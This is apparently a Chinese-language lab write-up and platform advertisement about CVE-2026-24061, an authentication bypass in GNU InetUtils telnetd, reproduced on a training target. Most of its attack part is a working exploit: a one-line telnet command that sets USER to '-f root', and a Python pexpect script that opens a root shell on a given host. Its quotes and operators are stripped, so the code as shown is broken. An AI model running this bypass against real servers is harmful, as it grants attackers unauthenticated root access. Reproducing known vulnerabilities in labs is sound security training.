CVE漏洞系列之—GNU InetUtils telnetd 远程认证绕过漏洞(CVE-2026-24061)

📅 2026/7/8 11:55:28
CVE漏洞系列之—GNU InetUtils telnetd 远程认证绕过漏洞(CVE-2026-24061)
简介CVE-2026-24061是GNU InetUtils中telnetd服务的一个认证绕过漏洞允许攻击者无需任何凭证直接获取目标系统的root权限。该漏洞已于2026年初被公开披露影响范围广泛全球超过20万台设备暴露风险。漏洞核心攻击者通过Telnet连接时可发送特制的USER环境变量值-f root利用Linux登录程序的-f跳过认证参数直接以root身份登录系统。影响版本GNU InetUtils 1.9.3至2.7版本均受影响漏洞评级CVSS评分9.8严重级别环境搭建首先我们打开NextCyber网络安全实战演练平台在“课程中心”页面选择“新的”标签筛选出新上课程选择“inetutils”这个课程免费解锁复现。在课程的左边点击“跳转到问题”自动下拉到底部点击右下角的“启动靶机实例”开启靶机进行漏洞复现。漏洞复现靶机启动后开放23端口即telnet服务我们使用nmap工具进行全端口扫描对服务进行-sV扫描查看服务版本信息方法一我们直接执行以下命令获取目标shellUSER-f root telnet -a 10.22.39.203方法二我们使用以下python脚本进行漏洞利用#!/usr/bin/env python3 import shutil import pexpect import argparse def check_telnet(): if not shutil.which(telnet): print([ERROR] telnet client not found. Please install telnet.) sys.exit(1) def main(): check_telnet() parser argparse.ArgumentParser(descriptionCVE-2026-24061 telnetd exploit interactive shell) parser.add_argument(-t, --target, requiredTrue, helpTarget IP or hostname) parser.add_argument(-p, --port, typeint, default23, helpTelnet port) parser.add_argument(-T, --timeout, typeint, default10, helpSession timeout (seconds)) args parser.parse_args() ip args.target port args.port timeout args.timeout print(f[] Connecting to {ip}:{port}) try: child pexpect.spawn(fenv USER-f root telnet -a {ip} {port}, timeouttimeout) child.interact() except Exception as e: print(f[ERROR] {ip}:{port}: {e}) if __name__ __main__: main()可以看到漏洞利用成功能直接获取目标的root权限。靶机体验如果你也想体验这个漏洞的复现过程欢迎登陆我们的 Nextcyber 网络安全实战演练平台一键启动靶机无需复杂环境搭建随时随地进行靶机练习有学习需求或想获取更多资料的欢迎站内私信交流